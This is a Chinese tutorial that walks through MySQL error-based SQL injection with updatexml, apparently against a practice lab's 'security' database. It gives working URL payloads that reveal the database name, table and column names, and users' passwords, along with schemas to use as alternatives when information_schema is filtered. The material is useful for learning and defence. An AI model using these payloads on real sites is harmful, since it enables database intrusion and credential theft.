SQL报错注入之updatexml的实现

 更新时间:2024年10月30日 09:10:54   作者:半ོ糖ོ  
updatexml函数通过输入不符合XPATH格式的数据来触发报错,并利用这一点进行SQL注入,通过分析报错信息,可以判断是否存在注入点,并逐步爆出数据库名、表名、字段名以及敏感数据,感兴趣的可以了解一下

1.updatexml报错原理

updatexml(xml_doument,XPath_string,new_value)
第一个参数:XML的内容
第二个参数:是需要update的位置XPATH路径
第三个参数:是更新后的内容
所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

根据结果可以判断出存在数字型注入,并且页面会打印出报错信息,所以我们可以利用报错注入来解决

3.updatexml报错注入

3.1爆库名

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)

0x7e表示~符号,所以数据库名为security

3.2爆表名

mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index 

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)

根据结果可知当前security库下有四张表,并且users表最有可能存放用户信息

3.3爆字段名

我们通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

根据结果可以判断出字段名不全,这是因为updataxml函数只显示32位,所以我们可以用substr函数来慢慢截取来获得所有的字段名 

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)

这样我们最终会得到所有的字段名

如果我们给select语句多加一个where条件会变成什么样呢?

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

此次查询直接就爆出users表的列名,可以得到两个敏感字段就是username和password,最有可能存放用户的账号密码

3.4爆数据

?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)

通过limit函数可以爆出各个用户的密码

当然也可以通过刚刚所述的substr函数来截取密码

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)

此次updatexml报错注入就结束啦!

到此这篇关于SQL报错注入之updatexml的实现的文章就介绍到这了,更多相关SQL updatexml内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:

相关文章

  • SQL Agent服务无法启动的解决方法

    SQL Agent服务无法启动的解决方法

    SQL Agent服务无法启动怎么办?这篇文章主要介绍了SQL Agent服务无法启动的解决方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2017-03-03
  • SqlServer应用之sys.dm_os_waiting_tasks 引发的疑问(下)

    SqlServer应用之sys.dm_os_waiting_tasks 引发的疑问(下)

    这篇文章主要介绍了SqlServer应用之sys.dm_os_waiting_tasks 引发的疑问(下) 的相关资料,需要的朋友可以参考下
    2015-12-12
  • SQL Server的彻底卸载方法步骤

    SQL Server的彻底卸载方法步骤

    可能大家已经有深刻体会,SQL Server的卸载十分繁琐,本文主要介绍了SQL Server的彻底卸载方法步骤,具有一定的参考价值,感兴趣的可以了解一下
    2024-05-05
  • SQL Server数据库bcp导出备份文件应用示例

    SQL Server数据库bcp导出备份文件应用示例

    本节主要介绍了SQL Server数据库bcp导出备份文件应用,需要的朋友可以参考下
    2014-08-08
  • 数据库表的查询操作实践演练(实验三)

    数据库表的查询操作实践演练(实验三)

    这篇文章主要对数据库表的查询操作进行实践演练,针对实验一和实验二涉及到的内容进一步深入学习,进一步理解关系运算,巩固数据库的基础知识,感兴趣的小伙伴可以参考一下
    2015-08-08
  • SQL Server简单实现数据的日报和月报功能

    SQL Server简单实现数据的日报和月报功能

    这篇文章主要介绍了SQL Server简单实现数据的日报和月报功能,结合实例形式对比分析了SQL Server实现当日及当月数据的查询功能相关技巧,需要的朋友可以参考下
    2016-06-06
  • sqlserver数据库危险扩展删除和恢复代码

    sqlserver数据库危险扩展删除和恢复代码

    今天为了实现sqlserver的复制功能,因为以前删除了很多的sqlserver的一些会导致不安全因素的扩展,导致很多功能无法用,没有办法需要重新的恢复扩展。
    2010-07-07
  • SQL Server2012在开发中的一些新特性

    SQL Server2012在开发中的一些新特性

    SQL Server 2012已经发布一段时间了,最近在新的机器上安装了最新的SQL Server 2012 SP1,体检下感觉良好。官方给出了一大堆SQL2012相对于SQL2008R2的新特性,但是大多数对于普通开发人员来说都是浮云,根本用不到,下面就说说一些对于开发人员来说比较有用的新特性。
    2013-04-04
  • sql数据库不能直接用instr函数

    sql数据库不能直接用instr函数

    sql数据库不能直接用instr函数...
    2007-01-01
  • 浅谈SQL中Partition的相关用法

    浅谈SQL中Partition的相关用法

    本文主要介绍了浅谈SQL中Partition的相关用法,使用Partition可以根据指定的列或表达式将数据分成多个分区,具有一定的参考价值,感兴趣的可以了解一下
    2023-10-10

最新评论